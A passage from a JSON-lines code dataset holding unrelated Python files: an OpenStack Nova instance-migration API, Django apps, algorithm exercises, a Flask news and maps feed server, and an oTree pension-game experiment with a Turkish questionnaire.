{\"instance_uuid\": new_instance_ref['uuid'],\n \"params\": params}})\n self._commit_reservation(context, reservations)\n except:\n self._rollback_reservation(context, reservations)\n raise\n\n return self.get(context, new_instance_ref['uuid'])\n\n def _find_migration_target(self, context, instance_host, dest):\n gridcentric_hosts = self._list_gridcentric_hosts(context)\n\n if dest == None:\n # We will pick a random host.\n if instance_host in gridcentric_hosts:\n # We cannot migrate to ourselves so take that host out of the list.\n gridcentric_hosts.remove(instance_host)\n\n if len(gridcentric_hosts) == 0:\n raise exception.NovaException(_(\"There are no available hosts for the migration target.\"))\n random.shuffle(gridcentric_hosts)\n dest = gridcentric_hosts[0]\n\n elif dest not in gridcentric_hosts:\n raise exception.NovaException(_(\"Cannot migrate to host %s because it is not running the\"\n \" gridcentric service.\") % dest)\n elif dest == instance_host:\n raise exception.NovaException(_(\"Unable to migrate to the same host.\"))\n\n return dest\n\n def migrate_instance(self, context, instance_uuid, dest):\n # Grab the DB representation for the VM.\n instance_ref = self.get(context, instance_uuid)\n\n if instance_ref['task_state'] == task_states.MIGRATING:\n raise exception.NovaException(\n _(\"Unable to migrate instance %s because it is already migrating.\") %\n instance_uuid)\n elif instance_ref['vm_state'] != vm_states.ACTIVE:\n raise exception.NovaException(_(\"Unable to migrate instance %s because it is not active\") %\n instance_uuid)\n dest = self._find_migration_target(context, instance_ref['host'], dest)\n\n self.db.instance_update(context, instance_ref['uuid'], {'task_state':task_states.MIGRATING})\n LOG.debug(_(\"Casting gridcentric message for migrate_instance\") % locals())\n self._cast_gridcentric_message('migrate_instance', context,\n instance_ref['uuid'], host=instance_ref['host'],\n params={\"dest\" : dest})\n\n def list_launched_instances(self, context, instance_uuid):\n # Assert that the instance with the uuid actually exists.\n self.get(context, instance_uuid)\n filter = {\n 'metadata':{'launched_from':'%s' % instance_uuid},\n 'deleted':False\n }\n launched_instances = self.compute_api.get_all(context, filter)\n return launched_instances\n\n def list_blessed_instances(self, context, instance_uuid):\n # Assert that the instance with the uuid actually exists.\n self.get(context, instance_uuid)\n filter = {\n 'metadata':{'blessed_from':'%s' % instance_uuid},\n 'deleted':False\n }\n blessed_instances = self.compute_api.get_all(context, filter)\n return blessed_instances\n\n def check_delete(self, context, instance_uuid):\n \"\"\" Raises an error if the instance uuid is blessed. \"\"\"\n if self._is_instance_blessed(context, instance_uuid):\n raise exception.NovaException(\"Cannot delete a blessed instance. Please discard it instead.\")\n\n def _find_boot_host(self, context, metadata):\n\n gc_hosts = self._list_gridcentric_hosts(context)\n if metadata == None or 'gc:target_host' not in metadata:\n # Find a random host that is running the gridcentric services.\n random.shuffle(gc_hosts)\n target_host = gc_hosts[0]\n else:\n # Ensure that the target host is running the gridcentic service.\n target_host = metadata['gc:target_host']\n if target_host not in gc_hosts:\n raise exception.NovaException(\n _(\"Only able to launch on hosts running the gridcentric service.\"))\n return target_host\n\n def create(self, context, *args, **kwargs):\n \"\"\"\n This will create a new instance on a target host if one is specified in the\n gc:target-host metadata field.\n \"\"\"\n\n if not context.is_admin:\n raise exception.NovaException(_(\"This feature is restricted to only admin users.\"))\n metadata = kwargs.get('metadata', None)\n target_host = self._find_boot_host(context, metadata)\n\n # Normally the compute_api would send a message to the sceduler. In this case since\n # we have a target host, we'll just explicity send a message to that compute manager.\n compute_api = compute.API()\n def host_schedule(rpc_method,\n context, base_options,\n instance_type,\n availability_zone, injected_files,\n admin_password, image,\n num_instances,\n requested_networks,\n block_device_mapping,\n security_group,\n filter_properties):\n\n instance_uuid = base_options.get('uuid')\n now = utils.utcnow()\n self.db.instance_update(context, instance_uuid,\n {'host': target_host,\n 'scheduled_at': now})\n\n rpc.cast(context, rpc.queue_get_for(context, CONF.compute_topic, target_host),\n {\"method\": \"run_instance\",\n \"args\": {\"instance_uuid\": instance_uuid,\n \"availability_zone\": availability_zone,\n \"admin_password\": admin_password,\n \"injected_files\": injected_files,\n \"requested_networks\": requested_networks}})\n\n # Instance was already created before calling scheduler\n return self.get(context, instance_uuid)\n\n # Stub out the call to the scheduler and then delegate the rest of the work to the\n # compute api.\n compute_api._schedule_run_instance = host_schedule\n return compute_api.create(context, *args, **kwargs)\n","sub_path":"nova/gridcentric/nova/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":20351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"619625383","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'login'\nurlpatterns = [\n path('', views.send_to_websites, name='home'),\n path('login/', views.do_login, name='login'),\n path('logout/', views.do_logout, name='logout'),\n]\n","sub_path":"login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"209303698","text":"# https://oj.leetcode.com/problems/search-in-rotated-sorted-array/\n\nclass Solution:\n # @param A, a list of integers\n # @param target, an integer to be searched\n # @return an integer\n # loop invariant: before the ith iteration, A[left..right] is rotated sorted array\n # initialization: A[0..n-1] is rotated sorted array.\n # maintenance:\n # 1. if target is found, return mid\n def search(self, A, target):\n n = len(A)\n left, right = 0, n - 1\n while left <= right:\n mid = left + (right - left) / 2\n if A[mid] == target:\n return mid\n elif A[left] <= A[mid]:\n if A[left] <= target and target < A[mid]:\n right = mid - 1\n else:\n left = mid + 1\n else:\n if A[mid] < target and target <= A[right]:\n left = mid + 1\n else:\n right = mid - 1\n return -1\n","sub_path":"leetans/searchRotatedArray.py","file_name":"searchRotatedArray.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"52599901","text":"# from ExtendedEuklidianAlgorithm import *\n# from SquareAndMultiply import *\n# from ChineseRemainderTheorem import *\n\n\ndef allPerms(values):\n \"\"\"\n A generator that yields all permutations of the values in values. \n\n Params:\n valus: Must be an iterable object. All permutations of its content are yielded (Iterable)\n\n Yields:\n The next permutation of the values in values\n \n Raises:\n ValueError: Should values not be iterable\n \"\"\"\n try:\n values = iter(values)\n except:\n raise ValueError(\"Parameter values must be Iterable\")\n\n values = list(values)\n\n\n def innerAllPerms(setvalues,values):\n \"\"\"\n Inner function that yields all permutations of the given values recursively.\n\n One recursive call sets one more value of the current permutation and calls itself recursively \n to permutate over the rest. If only one value is left to permutate over the permutation is yielded and \n other values are set by the calling function.\n \"\"\"\n if len(values)==1:\n ret = setvalues[:]\n ret.append(values[0])\n yield ret\n elif len(values)==0:\n # only happens if the initial values were an empty iterator\n yield []\n else:\n # take from the front and append back at the end\n # this way we can circumvent iteration while working on the list\n unsetvalues = len(values)\n for i in range(unsetvalues):\n setvalues.append(values.pop(0))\n yield from innerAllPerms(setvalues,values)\n values.append(setvalues.pop(len(setvalues)-1))\n\n yield from innerAllPerms([],values)","sub_path":"Python/discreteMath/DiscreteMathTools.py","file_name":"DiscreteMathTools.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"34351340","text":"import math\nimport string\ndigs = string.digits + string.letters\n\ndef int2base(x, base):\n if x < 0: sign = -1\n elif x == 0: return digs[0]\n else: sign = 1\n x *= sign\n digits = []\n while x:\n digits.append(digs[x % base])\n x /= base\n if sign < 0:\n digits.append('-')\n digits.reverse()\n return ''.join(digits)\n\ndef liste_primes_erastothene(n):\n visited = [False for _ in range(n + 1)]\n visited[0] = visited[1] = True\n for i in range(2, n + 1):\n if visited[i]:\n continue\n for j in range(i*i, n + 1, i):\n visited[j] = True\n return [i for i in range(2, n + 1) if not visited[i]]\n\nlp = liste_primes_erastothene(10000000)\nllp = len(lp)\n\ndef get_divisor(p):\n r=math.sqrt(p)\n n = 0\n while n < llp and lp[n]<=r:\n if p%lp[n]==0:\n return lp[n]\n n+=1\n return False\n\ndef get_cases(filename):\n with open(filename, 'r') as f:\n T = int(f.readline())\n N, J = [int(x) for x in f.readline().split()]\n return N, J\n\ndef find_jamcoin(N, J):\n b = '1' + ''.join(['0' for _ in range(N-2)]) + '1'\n d = int(b, 2)\n count = 0\n res = []\n while count < J:\n divisors = is_jamcoin(b)\n if divisors:\n count += 1\n res.append((b, divisors))\n d += 2\n b = int2base(d, 2)\n return res\n\ndef is_jamcoin(b):\n divisors = []\n for base in range(2,11):\n divisor = get_divisor(int(b, base))\n if not(divisor):\n return False\n else :\n divisors.append(divisor)\n return divisors\n\ndef b_print(res, T, filename):\n with open(filename, 'w') as f:\n line = \"Case #1:\"\n print(line)\n f.write(line + \"\\n\")\n for t in range(T):\n line = \"{0} {1}\".format(res[t][0], ' '.join([str(x) for x in res[t][1]]))\n print(line)\n f.write(line + \"\\n\")\n\nif __name__ == '__main__':\n filename = 'testp3.txt'\n N, J = get_cases(filename)\n res = find_jamcoin(N, J)\n b_print(res, J, 'outputp3.txt')","sub_path":"codes/CodeJamCrawler/16_0_3_neat/16_0_3_floriangagnadre_p3.py","file_name":"16_0_3_floriangagnadre_p3.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"442097396","text":"import os\r\n\r\ndef delete_files():\r\n\tos.chdir(os.getcwd()+\"\\pics\")\r\n\tteams = os.listdir(os.getcwd())\r\n\tfor element in teams: #for each folder in the pics folder\r\n\t\tcurrent_dir = os.getcwd()+\"\\\\\"+element\r\n\t\tfiles = os.listdir(current_dir)\r\n\t\tfor f in files: #for each file in teams folder\r\n\t\t\tos.remove(current_dir+\"\\\\\\\\\"+f) #delete file\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tdelete_files()","sub_path":"delete_files.py","file_name":"delete_files.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"137221669","text":"from django.db import models\nfrom .utils import getLinkData\n\n# Create your models here.\nclass Link(models.Model):\n title = models.CharField(max_length=220, blank=True)\n url = models.URLField()\n current_price = models.FloatField(blank=True)\n old_price = models.FloatField(default=0)\n price_difference = models.FloatField(default=0)\n updated = models.DateTimeField(auto_now=True)\n created = models.DateTimeField(auto_now=True)\n \n def __str__(self):\n return self.title\n\n class Meta:\n ordering = ('price_difference', '-created')\n\n def save(self, *args, **kwargs):\n title, price = getLinkData(self.url)\n old_price = self.current_price\n if self.current_price:\n if price != old_price:\n diff = price - old_price\n self.price_difference = round(diff, 2)\n self.old_price = old_price\n \n\n else:\n self.old_price = 0\n self.price_difference = 0\n\n self.title = title\n self.current_price = price\n\n super().save(*args, **kwargs)","sub_path":"links/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"291298171","text":"import os\nimport sys\nimport json\nimport shelve\nimport traceback\nimport BrainiacConfig\n\nfrom flask import Flask\nfrom flask import request\nfrom flask import Response\nfrom flask import jsonify\nfrom flask import render_template\n\nfrom NinjaUtil import LoggingDaemon\nfrom BrainiacUtil import BrainiacApi\n\nfrom FeedHandlers import feed_twitter\nfrom FeedHandlers import feed_bbcnews\nfrom FeedHandlers import feed_googlemaps\n\ntfolder = os.path.join (os.path.dirname (os.path.abspath (__file__)), 'templates')\nsfolder = os.path.join (os.path.dirname (os.path.abspath (__file__)), 'static')\napp = Flask ('brainiac', template_folder=tfolder, static_folder=sfolder)\n\n@app.route (\"/\")\ndef index ():\n return render_template ('index.html')\n\n@app.route (\"/dashboard\")\ndef dashboard ():\n return render_template ('dashboard.html')\n\n@app.route (\"/javascript/\")\ndef staticJavaScript (path):\n return app.send_static_file (path)\n\n@app.route (BrainiacConfig.prefix + \"/amenities\", methods=[\"GET\"])\n@BrainiacApi\ndef getAmenityTypesListing ():\n ret = { 'data' : [] }\n for i in feed_googlemaps.Amenities:\n ret ['data'].append ({'type':i})\n return jsonify (ret)\n\n@app.route (BrainiacConfig.prefix + \"/lookup\", methods=[\"GET\"])\n@BrainiacApi (wants = [('GET', 'json')])\ndef getAreaAmenityNodes ():\n query = request.json ['location']\n qtype = request.json ['amenity']\n qradius = request.json ['radius']\n apikey = BrainiacConfig.GoogleMaps ['apikey']\n resource = BrainiacConfig.GoogleMaps ['resource']\n data = feed_googlemaps.GoogleMaps_feed_hook (resource, 'GoogleMaps', query, {},\n apikey=apikey, radius=qradius,\n amenityType=qtype,\n proxy=BrainiacConfig.Proxy)\n if data [0] is True:\n return jsonify (json.loads (data [1]))\n\n@app.route (BrainiacConfig.prefix + \"/bbcnews\", methods=[\"GET\", \"POST\"])\n@BrainiacApi (wants = [('POST','json')])\ndef bbcNewsFeed ():\n if request.method == 'GET':\n links = []\n for i in BrainiacConfig.BBCFeeds ['elements']:\n key = i.keys () [0]\n links.append ({'feed' : key})\n return jsonify ({'feeds' : links})\n elif request.method == 'POST':\n location = request.json ['location']\n found = (False, None)\n for i in BrainConfig.BBCFeeds ['elements']:\n if location in i:\n found = (True, i [location])\n if found [0] is False:\n resp = jsonify ({'error':'Invalid location %s' % location})\n resp.status_code = 400\n return resp\n else:\n LoggingDaemon.info (\"Looking up feed [%s]\" % found [1])\n db = shelve.open (BrainConfig.shelf)\n data = feed_bbcnews.BBCNews_feed_hook (found [1], key='BBCNews',\n location=location, shelve=db,\n proxy=BrainConfig.Proxy)\n db.close ()\n if data [0] is True:\n return jsonify (json.loads (data [1]))\n else:\n resp = jsonify ({'error':\"feed failed %s\" % str (sys.exc_info ())})\n resp.status_code = 400\n return resp\n\n@app.route (BrainiacConfig.prefix + \"/tweets\", methods=[\"GET\"])\n@BrainiacApi (wants = [('GET','json')])\ndef getTweetListing ():\n location = request.json ['location']\n query = request.json ['query']\n radius = request.json ['radius']\n data = feed_twitter.Twitter_feed_hook (BrainiacConfig.Twitter ['resource'],\n 'Twitter', location, {}, radius = radius, query=query,\n consumer_key = BrainiacConfig.Twitter ['consumer_key'],\n consumer_secret = BrainiacConfig.Twitter ['consumer_secret'],\n access_token = BrainiacConfig.Twitter ['access_token'],\n access_secret = BrainiacConfig.Twitter ['access_token_secret'],\n proxy=BrainiacConfig.Proxy)\n if data [0] is True:\n return jsonify (json.loads (data [1]))\n\nclass BrainiacsRestLayer:\n def __init__ (self, bind='localhost', port=8080, debug=False):\n self.bind = bind\n self.port = port\n self.debug = debug\n\n def execute (self):\n global app\n app.run (host=self.bind, port=self.port, debug=self.debug)\n","sub_path":"Brainiac/BrainiacServer.py","file_name":"BrainiacServer.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"55081457","text":"import random\n\nfrom otree.api import *\n\n\ndoc = \"\"\"\nThis is a Pension Game first introduced by Hammond(1975). \nThe Pension Game is a version of the standard investment game in which the amount sent by player 1 is tripled.\nIt was first proposed by\n\n Berg, Dickhaut, and McCabe (1995)\n.\n\"\"\"\n\n\nclass Constants(BaseConstants):\n name_in_url = 'TPEGcont'\n players_per_group = 8\n num_rounds = 10\n instructions_template = 'TPEGcont/instructions.html'\n table_template = 'TPEGcont/table.html'\n # Initial amount allocated to players+\n endowment_Decider = 9\n endowment_Receiver = 1\n multiplier = 1\n\n\nclass Subsession(BaseSubsession):\n pass\n\n\nclass Group(BaseGroup):\n sent_2 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P2\"\"\",\n )\n expect_2 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount expected by P2\"\"\",\n )\n sent_3 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P3\"\"\",\n )\n expect_3 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount expected by P3\"\"\",\n )\n sent_4 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P4\"\"\",\n )\n expect_4 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount expected by P4\"\"\",\n )\n sent_5 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P5\"\"\",\n )\n expect_5 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount expected by P5\"\"\",\n )\n sent_6 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P6\"\"\",\n )\n expect_6 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount expected by P6\"\"\",\n )\n sent_7 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P7\"\"\",\n )\n expect_7 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount expected by P7\"\"\",\n )\n sent_8 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P8\"\"\",\n )\n\n\nclass Player(BasePlayer):\n rol = models.StringField(initial='')\n overall_payoff = models.CurrencyField(initial=0)\n gpa = models.StringField(\n choices=[\n '0,00 - 0,50',\n '0,50 - 1,00',\n '1,00 - 1,50',\n '1,50 - 2,00',\n '2,00 - 2,50',\n '2,50 - 3,00',\n '3,00 - 3,50',\n '3,50 - 4,00',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Akademik Not Ortalamanız\",\n )\n accept = models.StringField(\n choices=['Kabul ediyorum.', 'Kabul etmiyorum'],\n widget=widgets.RadioSelectHorizontal,\n label=\"Gönüllü olarak katıldığım bu deneyde tarafımdan herhangi bir kişisel bilgi istenilmemiştir.\",\n )\n dep = models.StringField(\n choices=[\n 'STEM (Bilim, Teknoloji, Mühendislik ve Matematik)',\n 'HASS (Beşeri, Sanat ve Sosyal Bilimler)',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Alan\",\n )\n age = models.StringField(\n choices=['≤24', '25-29', '30-39', '40-54', '≥55'],\n widget=widgets.RadioSelectHorizontal,\n label=\"Yaş\",\n )\n gen = models.StringField(\n choices=['Kadın', 'Erkek'], widget=widgets.RadioSelectHorizontal, label=\"Cinsiyet\"\n )\n edu = models.StringField(\n choices=['Lisans', 'Yüksek Lisans', 'Doktora'],\n widget=widgets.RadioSelectHorizontal,\n label=\"Eğitim\",\n )\n inc = models.StringField(\n choices=['500-1000', '1000-2000', '2000-3000', '3000-4000', '4000-5000', '5000+'],\n widget=widgets.RadioSelectHorizontal,\n label=\"Aylık Ortalama Gelir\",\n )\n h_inc = models.StringField(\n choices=['500-1000', '1000-2000', '2000-3000', '3000-4000', '4000-5000', '5000+'],\n widget=widgets.RadioSelectHorizontal,\n label=\"Aylık Ortalama Hanehalkı Geliri\",\n )\n env_cons_2 = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Kaynaklarımızın daha uzun süre dayanması için herkes ürün tüketimini artırmayı bırakmalıdır.\",\n )\n env_cons_3 = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Bu ülke konut geliştirme konusunda(tarım arazileri üzerinde yeni alışveriş merkezi inşaatı, yeni alt bölümler vb.) daha fazla kısıtlamaya ihtiyaç duymaktadır.\",\n )\n env_cons_5 = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Aşırı kirlilik üreten şirketlere yönelik tüketici boykot programlarına başladım/katıldım.\",\n )\n env_cons_6 = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Kimse bakmazsa çöp dökerim.\",\n )\n env_cons_7 = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Bugün çevresel faaliyetlere katılımım, gelecek nesiller için çevrenin korunmasına yardımcı olacaktır.\",\n )\n env_cons_9 = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Kirliliğin bitki ve hayvan yaşamına yol açtığı zararı düşündüğümde kızıyorum.\",\n )\n investment_options_1 = models.StringField(\n choices=[\n '%10 olasılıkla 8₺ ve %90 olasılıkla 6,4₺',\n '%10 olasılıkla 15,4₺ ve %90 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_2 = models.StringField(\n choices=[\n '%20 olasılıkla 8₺ ve %80 olasılıkla 6,4₺',\n '%20 olasılıkla 15,4₺ ve %80 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_3 = models.StringField(\n choices=[\n '%30 olasılıkla 8₺ ve %70 olasılıkla 6,4₺',\n '%30 olasılıkla 15,4₺ ve %70 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_4 = models.StringField(\n choices=[\n '%40 olasılıkla 8₺ ve %60 olasılıkla 6,4₺',\n '%40 olasılıkla 15,4₺ ve %60 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_5 = models.StringField(\n choices=[\n '%50 olasılıkla 8₺ ve %50 olasılıkla 6,4₺',\n '%50 olasılıkla 15,4₺ ve %50 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_6 = models.StringField(\n choices=[\n '%60 olasılıkla 8₺ ve %40 olasılıkla 6,4₺',\n '%60 olasılıkla 15,4₺ ve %40 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_7 = models.StringField(\n choices=[\n '%70 olasılıkla 8₺ ve %30 olasılıkla 6,4₺',\n '%70 olasılıkla 15,4₺ ve %30 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_8 = models.StringField(\n choices=[\n '%80 olasılıkla 8₺ ve %20 olasılıkla 6,4₺',\n '%80 olasılıkla 15,4₺ ve %20 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_9 = models.StringField(\n choices=[\n '%90 olasılıkla 8₺ ve %10 olasılıkla 6,4₺',\n '%90 olasılıkla 15,4₺ ve %10 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_10 = models.StringField(\n choices=[\n '%100 olasılıkla 8₺ ve %0 olasılıkla 6,4₺',\n '%100 olasılıkla 15,4₺ ve %0 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n fate = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Kadere inanıyorum ve herşey tamamen özgür irade değil.\",\n )\n believe = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"İbadethanelerdeki hizmetlere/törenlere katılmak dışında yalnızken dua etmiyorum.\",\n )\n\n\n# FUNCTIONS\ndef creating_session(subsession: Subsession):\n subsession.group_randomly()\n rol_lst = ['P2', 'P3', 'P4', 'P5', 'P6', 'P7']\n for p in subsession.get_players():\n round = (\n subsession.round_number if subsession.round_number <= 8 else subsession.round_number - 8\n )\n if p.id_in_subsession == round:\n p.rol = 'P1'\n elif p.id_in_subsession == (9 - round):\n p.rol = 'P8'\n else:\n random.shuffle(rol_lst)\n p.rol = rol_lst.pop(0)\n for p in subsession.get_players():\n print('P{0}:{1}'.format(p.id_in_subsession, p.rol))\n print('---------------')\n\n\ndef set_payoffs(group: Group):\n for pl in group.get_players():\n if pl.rol == 'P1':\n pl.payoff = 2 * (Constants.endowment_Receiver + group.sent_2)\n elif pl.rol == 'P2':\n pl.payoff = (Constants.endowment_Decider - group.sent_2) * (\n Constants.endowment_Receiver + group.sent_3\n )\n elif pl.rol == 'P3':\n pl.payoff = (Constants.endowment_Decider - group.sent_3) * (\n Constants.endowment_Receiver + group.sent_4\n )\n elif pl.rol == 'P4':\n pl.payoff = (Constants.endowment_Decider - group.sent_4) * (\n Constants.endowment_Receiver + group.sent_5\n )\n elif pl.rol == 'P5':\n pl.payoff = (Constants.endowment_Decider - group.sent_5) * (\n Constants.endowment_Receiver + group.sent_6\n )\n elif pl.rol == 'P6':\n pl.payoff = (Constants.endowment_Decider - group.sent_6) * (\n Constants.endowment_Receiver + group.sent_7\n )\n elif pl.rol == 'P7':\n pl.payoff = (Constants.endowment_Decider - group.sent_7) * (\n Constants.endowment_Receiver + group.sent_8\n )\n elif pl.rol == 'P8':\n pl.payoff = (\n (Constants.endowment_Decider - group.sent_8)\n * (\n (Constants.endowment_Receiver + group.sent_2)\n + (Constants.endowment_Receiver + group.sent_3)\n + (Constants.endowment_Receiver + group.sent_4)\n + (Constants.endowment_Receiver + group.sent_5)\n + (Constants.endowment_Receiver + group.sent_6)\n + (Constants.endowment_Receiver + group.sent_7)\n + (Constants.endowment_Receiver + group.sent_8)\n )\n / 7\n )\n\n\n# PAGES\nclass Introduction(Page):\n @staticmethod\n def vars_for_template(player: Player):\n partner = player.get_others_in_group()[0]\n return {'round_number': '{}'.format(player.round_number)}\n\n\nclass instructions(Page):\n @staticmethod\n def is_displayed(player: Player):\n return player.round_number == 1\n\n form_model = 'player'\n form_fields = ['accept']\n\n\nclass ShuffleWaitPage(WaitPage):\n pass\n\n\nclass SendBackWaitPage(WaitPage):\n pass\n\n\nclass P8(Page):\n \"\"\"This page is only for P1\n P1 sends amount (all, some, or none) to P2\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_8']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P8'\n\n @staticmethod\n def vars_for_template(player: Player):\n partner = player.get_others_in_group()[0]\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n 'p1_receiver': Constants.endowment_Receiver + player.group.sent_2,\n 'p2_decider': Constants.endowment_Decider - player.group.sent_2,\n 'p2_receiver': Constants.endowment_Receiver + player.group.sent_3,\n 'p3_decider': Constants.endowment_Decider - player.group.sent_3,\n 'p3_receiver': Constants.endowment_Receiver + player.group.sent_4,\n 'p4_decider': Constants.endowment_Decider - player.group.sent_4,\n 'p4_receiver': Constants.endowment_Receiver + player.group.sent_5,\n 'p5_decider': Constants.endowment_Decider - player.group.sent_5,\n 'p5_receiver': Constants.endowment_Receiver + player.group.sent_6,\n 'p6_decider': Constants.endowment_Decider - player.group.sent_6,\n 'p6_receiver': Constants.endowment_Receiver + player.group.sent_7,\n 'p7_decider': Constants.endowment_Decider - player.group.sent_7,\n }\n\n\nclass P7(Page):\n \"\"\"This page is only for P7\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_7', 'expect_7']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P7'\n\n @staticmethod\n def vars_for_template(player: Player):\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n 'p1_receiver': Constants.endowment_Receiver + player.group.sent_2,\n 'p2_decider': Constants.endowment_Decider - player.group.sent_2,\n 'p2_receiver': Constants.endowment_Receiver + player.group.sent_3,\n 'p3_decider': Constants.endowment_Decider - player.group.sent_3,\n 'p3_receiver': Constants.endowment_Receiver + player.group.sent_4,\n 'p4_decider': Constants.endowment_Decider - player.group.sent_4,\n 'p4_receiver': Constants.endowment_Receiver + player.group.sent_5,\n 'p5_decider': Constants.endowment_Decider - player.group.sent_5,\n 'p5_receiver': Constants.endowment_Receiver + player.group.sent_6,\n 'p6_decider': Constants.endowment_Decider - player.group.sent_6,\n }\n\n\nclass P6(Page):\n \"\"\"This page is only for P6\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_6', 'expect_6']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P6'\n\n @staticmethod\n def vars_for_template(player: Player):\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n 'p1_receiver': Constants.endowment_Receiver + 